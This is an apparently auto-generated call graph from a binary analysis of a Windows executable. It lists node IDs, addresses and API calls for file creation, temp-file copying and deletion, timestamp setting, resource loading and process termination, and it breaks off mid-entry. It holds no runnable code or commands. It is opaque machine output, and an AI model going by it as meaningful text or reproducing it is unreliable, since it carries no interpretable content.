SetFilePointerEx 95823->96156 95824 60751c 95824->95804 95826 607645 95827 5afddb 22 API calls 95826->95827 95830 607679 95827->95830 95828 6075ff 95828->95826 95829 607619 95828->95829 96157 5fccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 95829->96157 95831 59a961 22 API calls 95830->95831 95833 607686 95831->95833 95833->95834 96158 5f417d 22 API calls __fread_nolock 95833->96158 95834->95665 96189 5fdbbe lstrlenW 95836->96189 95840 59a961 22 API calls 95839->95840 95841 606f1d 95840->95841 95842 59a961 22 API calls 95841->95842 95843 606f26 95842->95843 95844 606f3a 95843->95844 95845 59b567 39 API calls 95843->95845 95846 597510 53 API calls 95844->95846 95845->95844 95853 606f57 _wcslen 95846->95853 95847 606fbc 95849 597510 53 API calls 95847->95849 95848 6070bf 96194 594ecb 95848->96194 95851 606fc8 95849->95851 95856 59a8c7 22 API calls 95851->95856 95862 606fdb 95851->95862 95853->95847 95853->95848 95859 6070e9 95853->95859 95854 6070e5 95855 59a961 22 API calls 95854->95855 95854->95859 95858 60711a 95855->95858 95856->95862 95857 594ecb 94 API calls 95857->95854 95860 59a961 22 API calls 95858->95860 95859->95665 95864 607126 95860->95864 95861 607027 95863 597510 53 API calls 95861->95863 95862->95861 95865 607005 95862->95865 95868 59a8c7 22 API calls 95862->95868 95866 607034 95863->95866 95867 59a961 22 API calls 95864->95867 95869 5933c6 22 API calls 95865->95869 95870 607047 95866->95870 95871 60703d 95866->95871 95872 60712f 95867->95872 95868->95865 95873 60700f 95869->95873 96325 5fe199 GetFileAttributesW 95870->96325 95874 59a8c7 22 API calls 95871->95874 95876 59a961 22 API calls 95872->95876 95877 597510 53 API calls 95873->95877 95874->95870 95880 607138 95876->95880 95878 60701b 95877->95878 95881 596350 22 API calls 95878->95881 95879 607050 95882 607063 95879->95882 95885 594c6d 22 API calls 95879->95885 95883 597510 53 API calls 95880->95883 95881->95861 95884 597510 53 API calls 95882->95884 95891 607069 95882->95891 95886 607145 95883->95886 95887 6070a0 95884->95887 95885->95882 95888 59525f 22 API calls 95886->95888 96326 5fd076 57 API calls 95887->96326 95890 607166 95888->95890 95892 594c6d 22 API calls 95890->95892 95891->95859 95893 607175 95892->95893 95894 6071a9 95893->95894 95895 594c6d 22 API calls 95893->95895 95896 59a8c7 22 API calls 95894->95896 95897 607186 95895->95897 95898 6071ba 95896->95898 95897->95894 95900 596b57 22 API calls 95897->95900 95899 596350 22 API calls 95898->95899 95901 6071c8 95899->95901 95902 60719b 95900->95902 95903 596350 22 API calls 95901->95903 95904 596b57 22 API calls 95902->95904 95905 6071d6 95903->95905 95904->95894 95906 596350 22 API calls 95905->95906 95907 6071e4 95906->95907 95908 597510 53 API calls 95907->95908 95909 6071f0 95908->95909 96216 5fd7bc 95909->96216 95911 607201 95912 5fd4ce 4 API calls 95911->95912 95913 60720b 95912->95913 95914 597510 53 API calls 95913->95914 95918 607239 95913->95918 95915 607229 95914->95915 96270 602947 95915->96270 96327 594f39 95918->96327 96841 617f59 95919->96841 95921 61959b 95921->95665 95923 617f59 120 API calls 95922->95923 95924 6195af 95923->95924 95924->95665 95925->95667 95926->95626 95927->95632 95928->95640 95929->95651 95930->95651 95931->95628 95932->95662 95933->95662 95934->95662 95935->95660 95936->95662 95937->95691 95938->95693 95939->95694 95940->95697 95941->95719 95942->95719 95943->95715 95944->95715 95945->95720 95946->95715 95948 599c7e 95947->95948 95949 5df545 95947->95949 95954 5afddb 22 API calls 95948->95954 95950 5df556 95949->95950 95952 596b57 22 API calls 95949->95952 95951 59a6c3 22 API calls 95950->95951 95953 5df560 95951->95953 95952->95950 95953->95953 95955 599c91 95954->95955 95956 599c9a 95955->95956 95957 599cac 95955->95957 95958 599cb3 22 API calls 95956->95958 95959 59a961 22 API calls 95957->95959 95960 599ca2 95958->95960 95959->95960 95960->95725 95960->95729 96048 5954c6 95961->96048 95964 5954c6 3 API calls 95965 5afa9a 95964->95965 95965->95746 95967 5afe0b 22 API calls 95966->95967 95968 596295 95967->95968 95969 5afddb 22 API calls 95968->95969 95970 5962a3 95969->95970 95971 5af141 95970->95971 95972 5af188 95971->95972 95973 5af14c 95971->95973 95974 59a6c3 22 API calls 95972->95974 95973->95972 95976 5af15b 95973->95976 95975 5fcaeb 95974->95975 95983 5fcb1a 95975->95983 96062 5fca89 ReadFile SetFilePointerEx 95975->96062 96063 5949bd 22 API calls __fread_nolock 95975->96063 95977 5af170 95976->95977 95979 5af17d 95976->95979 96054 5af18e 95977->96054 96061 5fcbf2 26 API calls 95979->96061 95982 5af179 95982->95762 95983->95762 95986 59b578 95985->95986 95987 59b57f 95985->95987 95986->95987 96099 5b62d1 39 API calls _strftime 95986->96099 95987->95736 95989 59b5c2 95989->95736 95991 59625f 95990->95991 95992 596250 95990->95992 95991->95992 95993 596264 CloseHandle 95991->95993 95992->95735 95993->95992 95995 597522 95994->95995 95996 597525 95994->95996 95995->95747 95997 59755b 95996->95997 95998 59752d 95996->95998 96000 5d50f6 95997->96000 96003 59756d 95997->96003 96008 5d500f 95997->96008 96100 5b51c6 26 API calls 95998->96100 96103 5b5183 26 API calls 96000->96103 96001 59753d 96007 5afddb 22 API calls 96001->96007 96101 5afb21 51 API calls 96003->96101 96004 5d510e 96004->96004 96009 597547 96007->96009 96011 5afe0b 22 API calls 96008->96011 96016 5d5088 96008->96016 96010 599cb3 22 API calls 96009->96010 96010->95995 96012 5d5058 96011->96012 96013 5afddb 22 API calls 96012->96013 96014 5d507f 96013->96014 96015 599cb3 22 API calls 96014->96015 96015->96016 96102 5afb21 51 API calls 96016->96102 96018 59575c CreateFileW 96017->96018 96019 5d4035 96017->96019 96021 59577b 96018->96021 96020 5d403b CreateFileW 96019->96020 96019->96021 96020->96021 96022 5d4063 96020->96022 96021->95757 96021->95758 96023 5954c6 3 API calls 96022->96023 96024 5d406e 96023->96024 96024->96021 96026 5953f3 96025->96026 96039 5953f0 messages 96025->96039 96027 5954c6 3 API calls 96026->96027 96026->96039 96028 595410 96027->96028 96029 59541d 96028->96029 96030 5d3f4b 96028->96030 96032 5afe0b 22 API calls 96029->96032 96031 5afa5b 3 API calls 96030->96031 96031->96039 96033 595429 96032->96033 96034 595722 22 API calls 96033->96034 96035 595433 96034->96035 96036 599a40 2 API calls 96035->96036 96037 59543f 96036->96037 96038 5954c6 3 API calls 96037->96038 96038->96039 96039->95767 96040->95772 96041->95770 96042->95773 96043->95777 96044->95729 96045->95729 96046->95760 96047->95768 96053 5954dd 96048->96053 96049 5d3f9c SetFilePointerEx 96050 595564 SetFilePointerEx SetFilePointerEx 96051 595530 96050->96051 96051->95964 96052 5d3f8b 96052->96049 96053->96049 96053->96050 96053->96051 96053->96052 96064 5af1d8 96054->96064 96060 5af1c1 96060->95982 96061->95982 96062->95975 96063->95975 96065 5afe0b 22 API calls 96064->96065 96066 5af1ef 96065->96066 96067 5afddb 22 API calls 96066->96067 96068 5af1a6 96067->96068 96069 5997b6 96068->96069 96083 599a1e 96069->96083 96071 5997fc 96071->96060 96075 596e14 MultiByteToWideChar 96071->96075 96073 5997c7 96073->96071 96090 599a40 96073->96090 96096 599b01 22 API calls __fread_nolock 96073->96096 96076 596e40 96075->96076 96077 596e87 96075->96077 96079 5afe0b 22 API calls 96076->96079 96078 59a6c3 22 API calls 96077->96078 96082 596e7b 96078->96082 96080 596e55 MultiByteToWideChar 96079->96080 96098 596e90 22 API calls __fread_nolock 96080->96098 96082->96060 96084 5df378 96083->96084 96085 599a2f 96083->96085 96086 5afddb 22 API calls 96084->96086 96085->96073 96087 5df382 96086->96087 96088 5afe0b 22 API calls 96087->96088 96089 5df397 96088->96089 96091 599abb 96090->96091 96094 599a4e 96090->96094 96097 5ae40f SetFilePointerEx 96091->96097 96093 599a7c 96093->96073 96094->96093 96095 599a8c ReadFile 96094->96095 96095->96093 96095->96094 96096->96073 96097->96094 96098->96082 96099->95989 96100->96001 96101->96001 96102->96000 96103->96004 96105 59a961 22 API calls 96104->96105 96106 595275 96105->96106 96107 59a961 22 API calls 96106->96107 96108 59527d 96107->96108 96109 59a961 22 API calls 96108->96109 96110 595285 96109->96110 96111 59a961 22 API calls 96110->96111 96112 59528d 96111->96112 96113 5d3df5 96112->96113 96114 5952c1 96112->96114 96115 59a8c7 22 API calls 96113->96115 96116 596d25 22 API calls 96114->96116 96117 5d3dfe 96115->96117 96118 5952cf 96116->96118 96119 59a6c3 22 API calls 96117->96119 96120 5993b2 22 API calls 96118->96120 96123 595304 96119->96123 96121 5952d9 96120->96121 96121->96123 96124 596d25 22 API calls 96121->96124 96122 595349 96160 596d25 96122->96160 96123->96122 96125 595325 96123->96125 96135 5d3e20 96123->96135 96127 5952fa 96124->96127 96125->96122 96173 594c6d 96125->96173 96129 5993b2 22 API calls 96127->96129 96128 59535a 96131 595370 96128->96131 96136 59a8c7 22 API calls 96128->96136 96129->96123 96132 595384 96131->96132 96138 59a8c7 22 API calls 96131->96138 96137 59538f 96132->96137 96140 59a8c7 22 API calls 96132->96140 96134 596b57 22 API calls 96143 5d3ee0 96134->96143 96135->96134 96136->96131 96141 59a8c7 22 API calls 96137->96141 96144 59539a 96137->96144 96138->96132 96139 596d25 22 API calls 96139->96122 96140->96137 96141->96144 96142 594c6d 22 API calls 96142->96143 96143->96122 96143->96142 96176 5949bd 22 API calls __fread_nolock 96143->96176 96144->95799 96147 596362 96146->96147 96148 5d4a51 96146->96148 96178 596373 96147->96178 96188 594a88 22 API calls __fread_nolock 96148->96188 96151 5d4a5b 96153 5d4a67 96151->96153 96154 59a8c7 22 API calls 96151->96154 96152 59636e 96152->95804 96152->95806 96154->96153 96155->95824 96156->95828 96157->95826 96158->95834 96159->95834 96161 596d91 96160->96161 96162 596d34 96160->96162 96163 5993b2 22 API calls 96161->96163 96162->96161 96164 596d3f 96162->96164 96170 596d62 __fread_nolock 96163->96170 96165 5d4c9d 96164->96165 96166 596d5a 96164->96166 96168 5afddb 22 API calls 96165->96168 96177 596f34 22 API calls 96166->96177 96169 5d4ca7 96168->96169 96171 5afe0b 22 API calls 96169->96171 96170->96128 96172 5d4cda 96171->96172 96174 59aec9 22 API calls 96173->96174 96175 594c78 96174->96175 96175->96122 96175->96139 96176->96143 96177->96170 96179 596382 96178->96179 96184 5963b6 __fread_nolock 96178->96184 96180 5d4a82 96179->96180 96181 5963a9 96179->96181 96179->96184 96183 5afddb 22 API calls 96180->96183 96182 59a587 22 API calls 96181->96182 96182->96184 96185 5d4a91 96183->96185 96184->96152 96186 5afe0b 22 API calls 96185->96186 96187 5d4ac5 __fread_nolock 96186->96187 96188->96151 96190 5fdbdc GetFileAttributesW 96189->96190 96191 5fd4d5 96189->96191 96190->96191 96192 5fdbe8 FindFirstFileW 96190->96192 96191->95665 96192->96191 96193 5fdbf9 FindClose 96192->96193 96193->96191 96333 594e90 LoadLibraryA 96194->96333 96199 5d3ccf 96201 594f39 68 API calls 96199->96201 96200 594ef6 LoadLibraryExW 96341 594e59 LoadLibraryA 96200->96341 96203 5d3cd6 96201->96203 96205 594e59 3 API calls 96203->96205 96207 5d3cde 96205->96207 96363 5950f5 96207->96363 96208 594f20 96208->96207 96209 594f2c 96208->96209 96210 594f39 68 API calls 96209->96210 96212 594f31 96210->96212 96212->95854 96212->95857 96215 5d3d05 96217 5fd7d8 96216->96217 96218 5fd7dd 96217->96218 96219 5fd7f3 96217->96219 96221 59a8c7 22 API calls 96218->96221 96269 5fd7ee 96218->96269 96220 59a961 22 API calls 96219->96220 96222 5fd7fb 96220->96222 96221->96269 96223 59a961 22 API calls 96222->96223 96224 5fd803 96223->96224 96225 59a961 22 API calls 96224->96225 96226 5fd80e 96225->96226 96227 59a961 22 API calls 96226->96227 96228 5fd816 96227->96228 96229 59a961 22 API calls 96228->96229 96230 5fd81e 96229->96230 96231 59a961 22 API calls 96230->96231 96232 5fd826 96231->96232 96233 59a961 22 API calls 96232->96233 96234 5fd82e 96233->96234 96235 59a961 22 API calls 96234->96235 96236 5fd836 96235->96236 96237 59525f 22 API calls 96236->96237 96238 5fd84d 96237->96238 96239 59525f 22 API calls 96238->96239 96240 5fd866 96239->96240 96241 594c6d 22 API calls 96240->96241 96242 5fd872 96241->96242 96243 5fd885 96242->96243 96244 5993b2 22 API calls 96242->96244 96245 594c6d 22 API calls 96243->96245 96244->96243 96246 5fd88e 96245->96246 96247 5fd89e 96246->96247 96248 5993b2 22 API calls 96246->96248 96249 5fd8b0 96247->96249 96250 59a8c7 22 API calls 96247->96250 96248->96247 96251 596350 22 API calls 96249->96251 96250->96249 96252 5fd8bb 96251->96252 96512 5fd978 22 API calls 96252->96512 96254 5fd8ca 96513 5fd978 22 API calls 96254->96513 96256 5fd8dd 96257 594c6d 22 API calls 96256->96257 96258 5fd8e7 96257->96258 96259 5fd8fe 96258->96259 96260 5fd8ec 96258->96260 96262 594c6d 22 API calls 96259->96262 96261 5933c6 22 API calls 96260->96261 96263 5fd8f9 96261->96263 96264 5fd907 96262->96264 96267 596350 22 API calls 96263->96267 96265 5fd925 96264->96265 96266 5933c6 22 API calls 96264->96266 96268 596350 22 API calls 96265->96268 96266->96263 96267->96265 96268->96269 96269->95911 96271 602954 __wsopen_s 96270->96271 96272 5afe0b 22 API calls 96271->96272 96273 602971 96272->96273 96274 595722 22 API calls 96273->96274 96275 60297b 96274->96275 96276 60274e 27 API calls 96275->96276 96277 602986 96276->96277 96278 59511f 64 API calls 96277->96278 96279 60299b 96278->96279 96280 602a6c 96279->96280 96281 6029bf 96279->96281 96282 602e66 75 API calls 96280->96282 96540 602e66 96281->96540 96298 602a38 96282->96298 96286 5950f5 40 API calls 96287 602a91 96286->96287 96288 5950f5 40 API calls 96287->96288 96291 602aa1 96288->96291 96289 602a75 messages 96289->95918 96290 6029ed 96547 5bd583 26 API calls 96290->96547 96292 5950f5 40 API calls 96291->96292 96294 602abc 96292->96294 96295 5950f5 40 API calls 96294->96295 96296 602acc 96295->96296 96297 5950f5 40 API calls 96296->96297 96299 602ae7 96297->96299 96298->96286 96298->96289 96300 5950f5 40 API calls 96299->96300 96301 602af7 96300->96301 96302 5950f5 40 API calls 96301->96302 96303 602b07 96302->96303 96304 5950f5 40 API calls 96303->96304 96305 602b17 96304->96305 96514 603017 GetTempPathW GetTempFileNameW 96305->96514 96307 602b22 96308 5be5eb 29 API calls 96307->96308 96309 602b33 96308->96309 96309->96289 96312 5950f5 40 API calls 96309->96312 96321 602bed 96309->96321 96515 5bdbb3 96309->96515 96311 602bf8 96313 602c12 96311->96313 96314 602bfe DeleteFileW 96311->96314 96312->96309 96315 602c91 CopyFileW 96313->96315 96320 602c18 96313->96320 96314->96289 96316 602ca7 DeleteFileW 96315->96316 96317 602cb9 DeleteFileW 96315->96317 96316->96289 96537 602fd8 CreateFileW 96317->96537 96548 6022ce 96320->96548 96524 5be678 96321->96524 96324 602c80 DeleteFileW 96324->96289 96325->95879 96326->95891 96328 594f43 96327->96328 96330 594f4a 96327->96330 96329 5be678 67 API calls 96328->96329 96329->96330 96331 594f59 96330->96331 96332 594f6a FreeLibrary 96330->96332 96331->95859 96332->96331 96334 594ea8 GetProcAddress 96333->96334 96335 594ec6 96333->96335 96336 594eb8 96334->96336 96338 5be5eb 96335->96338 96336->96335 96337 594ebf FreeLibrary 96336->96337 96337->96335 96371 5be52a 96338->96371 96340 594eea 96340->96199 96340->96200 96342 594e8d 96341->96342 96343 594e6e GetProcAddress 96341->96343 96346 594f80 96342->96346 96344 594e7e 96343->96344 96344->96342 96345 594e86 FreeLibrary 96344->96345 96345->96342 96347 5afe0b 22 API calls 96346->96347 96348 594f95 96347->96348 96349 595722 22 API calls 96348->96349 96350 594fa1 __fread_nolock 96349->96350 96351 5d3d1d 96350->96351 96352 5950a5 96350->96352 96357 594fdc 96350->96357 96436 60304d 74 API calls 96351->96436 96425 5942a2 CreateStreamOnHGlobal 96352->96425 96355 5d3d22 96359 59511f 64 API calls 96355->96359 96356 5950f5 40 API calls 96356->96357 96357->96355 96357->96356 96358 59506e messages 96357->96358 96431 59511f 96357->96431 96358->96208 96360 5d3d45 96359->96360 96361 5950f5 40 API calls 96360->96361 96361->96358 96364 5d3d70 96363->96364 96365 595107 96363->96365 96458 5be8c4 96365->96458 96368 6028fe 96495 60274e 96368->96495 96370 602919 96370->96215 96374 5be536 CallCatchBlock 96371->96374 96372 5be544 96396 5bf2d9 20 API calls _free 96372->96396 96374->96372 96376 5be574 96374->96376 96375 5be549 96397 5c27ec 26 API calls pre_c_initialization 96375->96397 96378 5be579 96376->96378 96379 5be586 96376->96379 96398 5bf2d9 20 API calls _free 96378->96398 96388 5c8061 96379->96388 96382 5be58f 96383 5be5a2 96382->96383 96384 5be595 96382->96384 96400 5be5d4 LeaveCriticalSection __fread_nolock 96383->96400 96399 5bf2d9 20 API calls _free 96384->96399 96386 5be554 __fread_nolock 96386->96340 96389 5c806d CallCatchBlock 96388->96389 96401 5c2f5e EnterCriticalSection 96389->96401 96391 5c807b 96402 5c80fb 96391->96402 96395 5c80ac __fread_nolock 96395->96382 96396->96375 96397->96386 96398->96386 96399->96386 96400->96386 96401->96391 96410 5c811e 96402->96410 96403 5c8177 96421 5c4c7d 20 API calls _free 96403->96421 96405 5c8180 96407 5c29c8 _free 20 API calls 96405->96407 96408 5c8189 96407->96408 96411 5c8088 96408->96411 96422 5c3405 11 API calls 2 library calls 96408->96422 96410->96403 96410->96411 96419 5b918d EnterCriticalSection 96410->96419 96420 5b91a1 LeaveCriticalSection 96410->96420 96416 5c80b7 96411->96416 96412 5c81a8 96423 5b918d EnterCriticalSection 96412->96423 96415 5c81bb 96415->96411 96424 5c2fa6 LeaveCriticalSection 96416->96424 96418 5c80be 96418->96395 96419->96410 96420->96410 96421->96405 96422->96412 96423->96415 96424->96418 96426 5942bc FindResourceExW 96425->96426 96430 5942d9 96425->96430 96427 5d35ba LoadResource 96426->96427 96426->96430 96428 5d35cf SizeofResource 96427->96428 96427->96430 96429 5d35e3 LockResource 96428->96429 96428->96430 96429->96430 96430->96357 96432 59512e 96431->96432 96433 5d3d90 96431->96433 96437 5bece3 96432->96437 96436->96355 96440 5beaaa 96437->96440 96439 59513c 96439->96357 96443 5beab6 CallCatchBlock 96440->96443 96441 5beac2 96453 5bf2d9 20 API calls _free 96441->96453 96442 5beae8 96455 5b918d EnterCriticalSection 96442->96455 96443->96441 96443->96442 96445 5beac7 96454 5c27ec 26 API calls pre_c_initialization 96445->96454 96448 5beaf4 96456 5bec0a 62 API calls 2 library calls 96448->96456 96450 5beb08 96457 5beb27 LeaveCriticalSection __fread_nolock 96450->96457 96452 5bead2 __fread_nolock 96452->96439 96453->96445 96454->96452 96455->96448 96456->96450 96457->96452 96461 5be8e1 96458->96461 96460 595118 96460->96368 96462 5be8ed CallCatchBlock 96461->96462 96463 5be92d 96462->96463 96464 5be900 ___scrt_fastfail 96462->96464 96466 5be925 __fread_nolock 96462->96466 96474 5b918d EnterCriticalSection 96463->96474 96488 5bf2d9 20 API calls _free 96464->96488 96466->96460 96467 5be937 96475 5be6f8 96467->96475 96470 5be91a 96489 5c27ec 26 API calls pre_c_initialization 96470->96489 96474->96467 96479 5be70a ___scrt_fastfail 96475->96479 96481 5be727 96475->96481 96476 5be717 96491 5bf2d9 20 API calls _free 96476->96491 96478 5be71c 96492 5c27ec 26 API calls pre_c_initialization 96478->96492 96479->96476 96479->96481 96483 5be76a __fread_nolock 96479->96483 96490 5be96c LeaveCriticalSection __fread_nolock 96481->96490 96482 5be886 ___scrt_fastfail 96494 5bf2d9 20 API calls _free 96482->96494 96483->96481 96483->96482 96485 5bd955 __fread_nolock 26 API calls 96483->96485 96487 5c8d45 __fread_nolock 38 API calls 96483->96487 96493 5bcf78 26 API calls 4 library calls 96483->96493 96485->96483 96487->96483 96488->96470 96489->96466 96490->96466 96491->96478 96492->96481 96493->96483 96494->96478 96498 5be4e8 96495->96498 96497 60275d 96497->96370 96501 5be469 96498->96501 96500 5be505 96500->96497 96502 5be478 96501->96502 96503 5be48c 96501->96503 96509 5bf2d9 20 API calls _free 96502->96509 96507 5be488 __alldvrm 96503->96507 96511 5c333f 11 API calls 2 library calls 96503->96511 96506 5be47d 96510 5c27ec 26 API calls pre_c_initialization 96506->96510 96507->96500 96509->96506 96510->96507 96511->96507 96512->96254 96513->96256 96514->96307 96516 5bdbdd 96515->96516 96517 5bdbc1 96515->96517 96516->96309 96517->96516 96518 5bdbcd 96517->96518 96519 5bdbe3 96517->96519 96580 5bf2d9 20 API calls _free 96518->96580 96577 5bd9cc 96519->96577 96522 5bdbd2 96581 5c27ec 26 API calls pre_c_initialization 96522->96581 96525 5be684 CallCatchBlock 96524->96525 96526 5be6aa 96525->96526 96527 5be695 96525->96527 96536 5be6a5 __fread_nolock 96526->96536 96716 5b918d EnterCriticalSection 96526->96716 96733 5bf2d9 20 API calls _free 96527->96733 96530 5be69a 96734 5c27ec 26 API calls pre_c_initialization 96530->96734 96532 5be6c6 96717 5be602 96532->96717 96534 5be6d1 96735 5be6ee LeaveCriticalSection __fread_nolock 96534->96735 96536->96311 96538 603013 96537->96538 96539 602fff SetFileTime CloseHandle 96537->96539 96538->96289 96539->96538 96545 602e7a 96540->96545 96541 6029c4 96541->96289 96546 5bd583 26 API calls 96541->96546 96542 5950f5 40 API calls 96542->96545 96543 6028fe 27 API calls 96543->96545 96544 59511f 64 API calls 96544->96545 96545->96541 96545->96542 96545->96543 96545->96544 96546->96290 96547->96298 96549 6022e7 96548->96549 96550 6022d9 96548->96550 96552 60232c 96549->96552 96553 5be5eb 29 API calls 96549->96553 96572 6022f0 96549->96572 96551 5be5eb 29 API calls 96550->96551 96551->96549 96809 602557 96552->96809 96555 602311 96553->96555 96555->96552 96557 60231a 96555->96557 96556 602370 96558 602374 96556->96558 96559 602395 96556->96559 96560 5be678 67 API calls 96557->96560 96557->96572 96562 602381 96558->96562 96564 5be678 67 API calls 96558->96564 96813 602171 96559->96813 96560->96572 96567 5be678 67 API calls 96562->96567 96562->96572 96563 60239d 96565 6023c3 96563->96565 96566 6023a3 96563->96566 96564->96562 96820 6023f3 96565->96820 96568 6023b0 96566->96568 96570 5be678 67 API calls 96566->96570 96567->96572 96571 5be678 67 API calls 96568->96571 96568->96572 96570->96568 96571->96572 96572->96317 96572->96324 96573 6023ca 96574 6023de 96573->96574 96575 5be678 67 API calls 96573->96575 96574->96572 96575->96574 96582 5bd97b 96577->96582 96579 5bd9f0 96579->96516 96580->96522 96581->96516 96583 5bd987 CallCatchBlock 96582->96583 96590 5b918d EnterCriticalSection 96583->96590 96585 5bd995 96591 5bd9f4 96585->96591 96589 5bd9b3 __fread_nolock 96589->96579 96590->96585 96599 5c49a1 96591->96599 96597 5bd9a2 96598 5bd9c0 LeaveCriticalSection __fread_nolock 96597->96598 96598->96589 96600 5bd955 __fread_nolock 26 API calls 96599->96600 96601 5c49b0 96600->96601 96602 5cf89b __fread_nolock 26 API calls 96601->96602 96603 5c49b6 96602->96603 96607 5bda09 96603->96607 96620 5c3820 21 API calls _free 96603->96620 96605 5c4a15 96606 5c29c8 _free 20 API calls 96605->96606 96606->96607 96608 5bda3a 96607->96608 96611 5bda4c 96608->96611 96614 5bda24 96608->96614 96609 5bda5a 96646 5bf2d9 20 API calls _free 96609->96646 96611->96609 96611->96614 96617 5bda85 __fread_nolock 96611->96617 96612 5bda5f 96647 5c27ec 26 API calls pre_c_initialization 96612->96647 96619 5c4a56 62 API calls 96614->96619 96616 5bd955 __fread_nolock 26 API calls 96616->96617 96617->96614 96617->96616 96621 5c59be 96617->96621 96648 5bdc0b 96617->96648 96619->96597 96620->96605 96622 5c59ca CallCatchBlock 96621->96622 96623 5c59ea 96622->96623 96624 5c59d2 96622->96624 96626 5c5a88 96623->96626 96631 5c5a1f 96623->96631 96708 5bf2c6 20 API calls _free 96624->96708 96713 5bf2c6 20 API calls _free 96626->96713 96627 5c59d7 96709 5bf2d9 20 API calls _free 96627->96709 96630 5c5a8d 96714 5bf2d9 20 API calls _free 96630->96714 96654 5c5147 EnterCriticalSection 96631->96654 96632 5c59df __fread_nolock 96632->96617 96635 5c5a95 96715 5c27ec 26 API calls pre_c_initialization 96635->96715 96636 5c5a25 96638 5c5a56 96636->96638 96639 5c5a41 96636->96639 96655 5c5aa9 96638->96655 96710 5bf2d9 20 API calls _free 96639->96710 96642 5c5a46 96711 5bf2c6 20 API calls _free 96642->96711 96644 5c5a51 96646->96612 96647->96614 96649 5bdc23 96648->96649 96650 5bdc1f 96648->96650 96649->96650 96651 5bd955 __fread_nolock 26 API calls 96649->96651 96650->96617 96652 5bdc43 96651->96652 96653 5c59be __wsopen_s 62 API calls 96652->96653 96653->96650 96654->96636 96656 5c5ad7 96655->96656 96657 5c5ad0 96655->96657 96658 5c5afa 96656->96658 96659 5c5adb 96656->96659 96660 5b0a8c _ValidateLocalCookies 5 API calls 96657->96660 96662 5c5b4b 96658->96662 96663 5c5b2e 96658->96663 96661 5bf2c6 __dosmaperr 20 API calls 96659->96661 96664 5c5cb1 96660->96664 96664->96644 96708->96627 96709->96632 96710->96642 96711->96644 96713->96630 96714->96635 96715->96632 96716->96532 96718 5be60f 96717->96718 96719 5be624 96717->96719 96755 5bf2d9 20 API calls _free 96718->96755 96721 5bdc0b 62 API calls 96719->96721 96725 5be61f 96719->96725 96723 5be638 96721->96723 96722 5be614 96756 5c27ec 26 API calls pre_c_initialization 96722->96756 96736 5c4d7a 96723->96736 96725->96534 96728 5bd955 __fread_nolock 26 API calls 96729 5be646 96728->96729 96740 5c862f 96729->96740 96732 5c29c8 _free 20 API calls 96732->96725 96733->96530 96734->96536 96735->96536 96737 5be640 96736->96737 96738 5c4d90 96736->96738 96737->96728 96738->96737 96739 5c29c8 _free 20 API calls 96738->96739 96739->96737 96741 5c863e 96740->96741 96742 5c8653 96740->96742 96760 5bf2c6 20 API calls _free 96741->96760 96744 5c868e 96742->96744 96749 5c867a 96742->96749 96762 5bf2c6 20 API calls _free 96744->96762 96745 5c8643 96761 5bf2d9 20 API calls _free 96745->96761 96747 5c8693 96763 5bf2d9 20 API calls _free 96747->96763 96757 5c8607 96749->96757 96752 5c869b 96764 5c27ec 26 API calls pre_c_initialization 96752->96764 96753 5be64c 96753->96725 96753->96732 96755->96722 96756->96725 96765 5c8585 96757->96765 96759 5c862b 96759->96753 96760->96745 96761->96753 96762->96747 96763->96752 96764->96753 96766 5c8591 CallCatchBlock 96765->96766 96776 5c5147 EnterCriticalSection 96766->96776 96768 5c859f 96769 5c85c6 96768->96769 96770 5c85d1 96768->96770 96777 5c86ae 96769->96777 96792 5bf2d9 20 API calls _free 96770->96792 96773 5c85cc 96793 5c85fb LeaveCriticalSection __wsopen_s 96773->96793 96775 5c85ee __fread_nolock 96775->96759 96776->96768 96794 5c53c4 96777->96794 96779 5c86c4 96780 5c86be 96780->96779 96782 5c53c4 __wsopen_s 26 API calls 96780->96782 96791 5c86f6 96780->96791 96791->96779 96792->96773 96793->96775 96795 5c53e6 96794->96795 96796 5c53d1 96794->96796 96798 5bf2c6 __dosmaperr 20 API calls 96795->96798 96802 5c540b 96795->96802 96797 5bf2c6 __dosmaperr 20 API calls 96796->96797 96799 5c53d6 96797->96799 96800 5c5416 96798->96800 96801 5bf2d9 _free 20 API calls 96799->96801 96803 5bf2d9 _free 20 API calls 96800->96803 96802->96780 96810 60257c 96809->96810 96812 602565 __fread_nolock 96809->96812 96811 5be8c4 __fread_nolock 40 API calls 96810->96811 96811->96812 96812->96556 96814 5bea0c ___std_exception_copy 21 API calls 96813->96814 96815 60217f 96814->96815 96816 5bea0c ___std_exception_copy 21 API calls 96815->96816 96817 602190 96816->96817 96818 5bea0c ___std_exception_copy 21 API calls 96817->96818 96819 60219c 96818->96819 96819->96563 96827 602408 96820->96827 96821 6024c0 96832 602724 96821->96832 96823 6021cc 40 API calls 96823->96827 96824 6024c7 96824->96573 96827->96821 96827->96823 96827->96824 96828 602606 96827->96828 96836 602269 40 API calls 96827->96836 96829 602617 96828->96829 96830 60261d 96828->96830 96829->96830 96837 6026d7 96829->96837 96830->96827 96833 602731 96832->96833 96834 602742 96832->96834 96835 5bdbb3 65 API calls 96833->96835 96834->96824 96835->96834 96836->96827 96842 597510 53 API calls 96841->96842 96843 617f90 96842->96843 96865 617fd5 messages 96843->96865 96879 618cd3 96843->96879 96845 618281 96846 61844f 96845->96846 96850 61828f 96845->96850 96920 618ee4 60 API calls 96846->96920 96849 61845e 96849->96850 96851 61846a 96849->96851 96892 617e86 96850->96892 96851->96865 96852 597510 53 API calls 96870 618049 96852->96870 96857 6182c8 96907 5afc70 96857->96907 96860 618302 96914 5963eb 22 API calls 96860->96914 96861 6182e8 96913 60359c 82 API calls __wsopen_s 96861->96913 96864 6182f3 GetCurrentProcess TerminateProcess 96864->96860 96865->95921 96866 618311 96915 596a50 22 API calls 96866->96915 96868 61832a 96877 618352 96868->96877 96916 5a04f0 22 API calls 96868->96916 96870->96845 96870->96852 96870->96865 96911 5f417d 22 API calls __fread_nolock 96870->96911 96912 61851d 42 API calls _strftime 96870->96912 96871 6184c5 96871->96865 96873 6184d9 FreeLibrary 96871->96873 96872 618341 96917 618b7b 75 API calls 96872->96917 96873->96865 96877->96871 96918 5a04f0 22 API calls 96877->96918 96919 59aceb 23 API calls messages 96877->96919 96921 618b7b 75 API calls 96877->96921 96880 59aec9 22 API calls 96879->96880 96881 618cee CharLowerBuffW 96880->96881 96922 5f8e54 96881->96922 96885 59a961 22 API calls 96886 618d2a 96885->96886 96887 596d25 22 API calls 96886->96887 96888 618d3e 96887->96888 96889 5993b2 22 API calls 96888->96889 96891 618d48 _wcslen 96889->96891 96890 618e5e _wcslen 96890->96870 96891->96890 96929 61851d 42 API calls _strftime 96891->96929 96893 